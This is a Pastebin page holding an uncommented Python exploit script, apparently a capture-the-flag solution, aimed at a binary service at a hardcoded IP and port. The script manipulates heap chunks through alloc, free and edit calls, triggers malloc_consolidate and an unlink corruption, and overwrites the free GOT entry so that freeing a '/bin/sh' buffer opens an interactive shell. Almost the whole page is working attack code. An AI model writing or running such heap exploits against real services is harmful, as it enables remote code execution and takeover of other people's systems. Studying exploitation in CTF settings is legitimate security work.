Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # Author : peternguyen
- from Pwn import *
- p = Pwn(mode=1,host='47.75.128.158',port=9999)
- def alloc(name,type):
- p.sendint(1)
- p.sendint(type)
- p.send(name)
- def free(idx):
- p.sendint(2)
- p.sendint(idx)
- def edit(idx,name,data):
- p.sendint(3)
- p.sendint(idx)
- p.send(name)
- p.send(data)
- def exploit(**kargs):
- global p # use global var
- if kargs.has_key('p'):
- if kargs['p'].__class__.__name__ == 'Pwn': # is pwn object
- p = kargs['p']
- p.connect()
- t = p.pA(0, 0x21)
- t = t.ljust(47,'X')
- # raw_input('Debug>')
- alloc('A'*7,1) #0
- alloc('B'*7,2) #1
- alloc('C'*7,1) #2
- edit(1,'R'*7,t)
- free(0)
- t = p.pA(0,0x21)
- t+= '\x00'*8
- t = t.ljust(47,'A')
- edit(0,p.pack(0x602120)[:-1],t)
- alloc('A'*7,1)
- alloc('B'*7,1)
- free(0)
- t = p.pA(0,0x11) + '\x00'*8 + p.pack(0x00)
- t+= p.pack(0x6020c8) + p.pack(0x6020d0)[:-1]
- edit(0,p.pack(0x602120)[:-1],t)
- alloc('A'*7,1)
- alloc('A'*7,13337) # trigger malloc_consolidate
- # abuse unlink forward_chunk to overwrite
- # pigs list
- p.send('a')
- # raw_input('>')
- edit(4,p.pack(0x602018)[:-1],t) # free_got
- edit(1,p.pack(0x04006E0)[:-1],t)
- edit(0,'/bin/sh',t)
- free(0)
- p.io()
- exploit()
Add Comment
Please, Sign In to add comment
